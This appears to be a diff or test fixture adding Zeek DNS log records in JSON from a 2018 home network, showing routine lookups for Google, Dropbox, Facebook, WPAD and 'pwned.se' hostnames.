+{"ts":"2018-08-03T23:38:56.767734Z","uid":"CxnrCi4iPOL03FFnIi","id.orig_h":"192.168.0.54","id.orig_p":56810,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":59706,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.485157Z","uid":"CGFRAeSqUaCD6p3v9","id.orig_h":"192.168.0.54","id.orig_p":58645,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":31183,"query":"crl.microsoft.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.217301Z","uid":"CGFRAeSqUaCD6p3v9","id.orig_h":"192.168.0.54","id.orig_p":58645,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":3374,"query":"clients6.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148"],"TTLs":[190.0,132.0,132.0,132.0,132.0,132.0,132.0,132.0,132.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.414614Z","uid":"CgPMuZ3l9g8KIiqLBl","id.orig_h":"192.168.0.54","id.orig_p":58709,"id.resp_h":"224.0.0.252","id.resp_p":5355,"proto":"udp","trans_id":56031,"query":"wpad","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.755004Z","uid":"CgPMuZ3l9g8KIiqLBl","id.orig_h":"192.168.0.54","id.orig_p":58709,"id.resp_h":"224.0.0.252","id.resp_p":5355,"proto":"udp","trans_id":43059,"query":"wpad","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.586610Z","uid":"CGYRl21EzLy3lTZQaj","id.orig_h":"192.168.0.54","id.orig_p":57805,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":25420,"query":"crl.microsoft.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["crl.www.ms.akadns.net","a1363.dscg.akamai.net","80.239.254.18","80.239.254.16"],"TTLs":[319.0,160.0,4.0,4.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.700914Z","uid":"CjYI6o3YpUdtNkqP16","id.orig_h":"192.168.0.54","id.orig_p":52550,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":37233,"query":"a.config.skype.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.746455Z","uid":"C8uuod45ZGh9qMc5fj","id.orig_h":"192.168.0.54","id.orig_p":64659,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55477,"query":"client.dropbox.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.398317Z","uid":"CaTQ1T2WK9pxvlYCk5","id.orig_h":"192.168.0.54","id.orig_p":60928,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":23995,"query":"clients6.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148"],"TTLs":[190.0,132.0,132.0,132.0,132.0,132.0,132.0,132.0,132.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.135846Z","uid":"CFkonX3rLIehMnHtyd","id.orig_h":"192.168.0.54","id.orig_p":55515,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":2416,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.948611Z","uid":"CTxoka2tRaoSHzFqmg","id.orig_h":"192.168.0.54","id.orig_p":58975,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":59154,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.009318Z","uid":"CrfVpF3G4ZTpmzsbsk","id.orig_h":"192.168.0.54","id.orig_p":56734,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":20402,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.522248Z","uid":"CrfVpF3G4ZTpmzsbsk","id.orig_h":"192.168.0.54","id.orig_p":56734,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":22111,"query":"connect.facebook.net","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.633622Z","uid":"CfUoFu4TBpi1COE4zj","id.orig_h":"192.168.0.51","id.orig_p":62231,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":6889,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.815914Z","uid":"CIM2ra2bzhzaWWVUj7","id.orig_h":"192.168.0.54","id.orig_p":56428,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":4898,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.033321Z","uid":"CtDxCP3GsSrD9YqIO4","id.orig_h":"192.168.0.51","id.orig_p":31444,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":26340,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.661544Z","uid":"CmlKWQ3qjdIqS7YDF1","id.orig_h":"192.168.0.54","id.orig_p":60095,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":54073,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.902413Z","uid":"CTcVWv3zPQVE93SqN2","id.orig_h":"192.168.0.51","id.orig_p":52150,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":34671,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.513614Z","uid":"CTcVWv3zPQVE93SqN2","id.orig_h":"192.168.0.51","id.orig_p":52150,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13132,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["2a00:1450:400f:804::2004"],"TTLs":[250.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.834947Z","uid":"CO3RHKgXc7MpsfSgl","id.orig_h":"192.168.0.54","id.orig_p":53254,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40332,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.774183Z","uid":"CHiO4O20ISp1jnUUAc","id.orig_h":"192.168.0.51","id.orig_p":10531,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":14804,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.059258Z","uid":"Ceqlum1Um13PpYVN23","id.orig_h":"192.168.0.51","id.orig_p":9522,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":31609,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.976714Z","uid":"CoOBs23KSpvskQppTc","id.orig_h":"192.168.0.51","id.orig_p":12750,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":48241,"query":"versioncheck-bg.addons.mozilla.org","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["versioncheck.addons.mozilla.org"],"TTLs":[21.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.228340Z","uid":"C0VUpj3Rxca5w1tbr6","id.orig_h":"192.168.0.54","id.orig_p":59312,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":25428,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.940875Z","uid":"CTKa2cit6AOiiE083","id.orig_h":"192.168.0.54","id.orig_p":59088,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38055,"query":"clients6.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.405466Z","uid":"CKHkUT39okg7b1viA7","id.orig_h":"192.168.0.54","id.orig_p":61009,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":64471,"query":"talkgadget.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.787558Z","uid":"CkOO1A10kx2CV25jc6","id.orig_h":"192.168.0.51","id.orig_p":63253,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":35125,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.430811Z","uid":"CkOO1A10kx2CV25jc6","id.orig_h":"192.168.0.51","id.orig_p":63253,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":33321,"query":"safebrowsing-cache.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["safebrowsing.cache.l.google.com","74.125.232.103","74.125.232.104","74.125.232.105","74.125.232.110","74.125.232.96","74.125.232.97","74.125.232.98","74.125.232.99","74.125.232.100","74.125.232.101","74.125.232.102"],"TTLs":[90424.0,205.0,205.0,205.0,205.0,205.0,205.0,205.0,205.0,205.0,205.0,205.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.739461Z","uid":"Cb3OJz337c1DWilmPc","id.orig_h":"192.168.0.54","id.orig_p":55523,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":52815,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[108.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.966216Z","uid":"Cb3OJz337c1DWilmPc","id.orig_h":"192.168.0.54","id.orig_p":55523,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":57286,"query":"mail.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlemail.l.google.com","216.58.209.133"],"TTLs":[188873.0,222.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.187444Z","uid":"C7I3f53oGdzI8Iusle","id.orig_h":"fe80::b536:88f0:ac41:1d7a","id.orig_p":52813,"id.resp_h":"ff02::1:3","id.resp_p":5355,"proto":"udp","trans_id":50459,"query":"wpad","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.830545Z","uid":"C7I3f53oGdzI8Iusle","id.orig_h":"fe80::b536:88f0:ac41:1d7a","id.orig_p":52813,"id.resp_h":"ff02::1:3","id.resp_p":5355,"proto":"udp","trans_id":8777,"query":"wpad","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.830545Z","uid":"C7I3f53oGdzI8Iusle","id.orig_h":"fe80::b536:88f0:ac41:1d7a","id.orig_p":52813,"id.resp_h":"ff02::1:3","id.resp_p":5355,"proto":"udp","trans_id":8777,"query":"wpad","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.388958Z","uid":"Cc2wbJ3Q6c2KOvHmai","id.orig_h":"192.168.0.54","id.orig_p":64627,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":37114,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.331201Z","uid":"Cc2wbJ3Q6c2KOvHmai","id.orig_h":"192.168.0.54","id.orig_p":64627,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38647,"query":"talkgadget.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.439537Z","uid":"CWuvgmnuHqaMFJqe","id.orig_h":"192.168.0.54","id.orig_p":55359,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":48206,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[165.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.750444Z","uid":"Ci69wj1rSmac8cl22","id.orig_h":"192.168.0.54","id.orig_p":50888,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13389,"query":"clients6.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.439537Z","uid":"Ci69wj1rSmac8cl22","id.orig_h":"192.168.0.54","id.orig_p":50888,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":12673,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[265.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.555906Z","uid":"CSKxeW3qShGtEcmsd3","id.orig_h":"192.168.0.54","id.orig_p":60493,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":29907,"query":"android.clients.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.946637Z","uid":"C5LyY01fktwK8i2La7","id.orig_h":"192.168.0.54","id.orig_p":51218,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":15911,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.242","173.194.40.243","173.194.40.244","173.194.40.240","173.194.40.241"],"TTLs":[170.0,170.0,170.0,170.0,170.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.257972Z","uid":"CGN7G341GeK71gF492","id.orig_h":"192.168.0.54","id.orig_p":53229,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":26980,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.036003Z","uid":"C4aSUl2QH79df9wDXk","id.orig_h":"192.168.0.54","id.orig_p":51174,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16153,"query":"talkgadget.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["talkgadget.l.google.com","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151"],"TTLs":[37041.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.378455Z","uid":"C9Wqtk2kYLMPHP0ql8","id.orig_h":"192.168.0.51","id.orig_p":2737,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":50246,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.556462Z","uid":"C2nwbg2ygiXzJqPmob","id.orig_h":"192.168.0.54","id.orig_p":58775,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":53524,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[165.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.105210Z","uid":"CG16Md3HtalrNYRbZ7","id.orig_h":"192.168.0.51","id.orig_p":7139,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":41849,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.854950Z","uid":"Cb3UHr3djwXjXLJnT8","id.orig_h":"192.168.0.54","id.orig_p":54110,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":23337,"query":"client.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["client.v.dropbox.com","108.160.166.139"],"TTLs":[228.0,47.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.854950Z","uid":"Cb3UHr3djwXjXLJnT8","id.orig_h":"192.168.0.54","id.orig_p":54110,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":23337,"query":"client.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["client.v.dropbox.com","108.160.166.11"],"TTLs":[215.0,18.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.529164Z","uid":"Cmn64z38k0PfikCDKc","id.orig_h":"192.168.0.54","id.orig_p":52667,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32871,"query":"client.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["client.v.dropbox.com","108.160.166.12"],"TTLs":[254.0,59.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.315393Z","uid":"CqqJ6F49yum0l94zi8","id.orig_h":"192.168.0.54","id.orig_p":51262,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":27703,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.115781Z","uid":"CqqJ6F49yum0l94zi8","id.orig_h":"192.168.0.54","id.orig_p":51262,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":51006,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.241","173.194.40.242","173.194.40.243","173.194.40.244","173.194.40.240"],"TTLs":[241.0,241.0,241.0,241.0,241.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.298098Z","uid":"CckAGS2A0y9VUZtUa1","id.orig_h":"192.168.0.51","id.orig_p":56011,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40727,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.113997Z","uid":"Cqz6n1ybtQxkkYB3c","id.orig_h":"192.168.0.54","id.orig_p":56683,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":46111,"query":"connect.facebook.net","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["connect.facebook.net.edgekey.net","e3821.dspe1.akamaiedge.net","2.23.143.139"],"TTLs":[931.0,338.0,15.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.242356Z","uid":"CPt6pM1fctqaXYvP5b","id.orig_h":"192.168.0.54","id.orig_p":57994,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":2790,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.978459Z","uid":"CPt6pM1fctqaXYvP5b","id.orig_h":"192.168.0.54","id.orig_p":57994,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":1424,"query":"clients4.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.186","213.155.151.187","213.155.151.180","213.155.151.181","213.155.151.182","213.155.151.183","213.155.151.184","213.155.151.185"],"TTLs":[289.0,290.0,290.0,290.0,290.0,290.0,290.0,290.0,290.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.988596Z","uid":"C3yOTY2qb6csWaKitb","id.orig_h":"192.168.0.54","id.orig_p":56662,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":44306,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.919717Z","uid":"CnedHq4wi628HA2RXi","id.orig_h":"192.168.0.51","id.orig_p":10241,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16885,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.900218Z","uid":"C0xagm34ldEEimevhh","id.orig_h":"192.168.0.51","id.orig_p":43789,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":30175,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.053796Z","uid":"CDyWnF3PdCjY1aHOm9","id.orig_h":"192.168.0.51","id.orig_p":56630,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":57449,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.477761Z","uid":"CDyWnF3PdCjY1aHOm9","id.orig_h":"192.168.0.51","id.orig_p":56630,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":47762,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.079083Z","uid":"CmM839uibGu5onLH8","id.orig_h":"192.168.0.54","id.orig_p":63015,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55621,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.966026Z","uid":"CUTjGA3ttuYob4DAh1","id.orig_h":"192.168.0.51","id.orig_p":21483,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":1206,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.973903Z","uid":"Cz8Rkw3ICqPddr3au9","id.orig_h":"192.168.0.54","id.orig_p":63253,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":20807,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.077234Z","uid":"CurVuw2kpEvPBtaaz5","id.orig_h":"192.168.0.54","id.orig_p":57764,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":22593,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.603621Z","uid":"CurVuw2kpEvPBtaaz5","id.orig_h":"192.168.0.54","id.orig_p":57764,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":25183,"query":"mail.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlemail.l.google.com","216.58.209.133"],"TTLs":[62573.0,65.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.725025Z","uid":"CGChjN1NNL1WWMcO8g","id.orig_h":"192.168.0.54","id.orig_p":64049,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38577,"query":"oauth.googleusercontent.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlehosted.l.googleusercontent.com","216.58.209.97"],"TTLs":[77004.0,224.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.760488Z","uid":"C2OUvlmvhfYMXtUc7","id.orig_h":"192.168.0.54","id.orig_p":61123,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":61396,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.575787Z","uid":"CKSMbgm9fqlAT58ag","id.orig_h":"192.168.0.54","id.orig_p":55949,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":22193,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.620019Z","uid":"C3lXKD31M3AAMdnEml","id.orig_h":"192.168.0.54","id.orig_p":51374,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13366,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.721228Z","uid":"Cv1hBW2lAZV3wvmlq5","id.orig_h":"192.168.0.54","id.orig_p":56316,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":8143,"query":"s-static.ak.facebook.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} 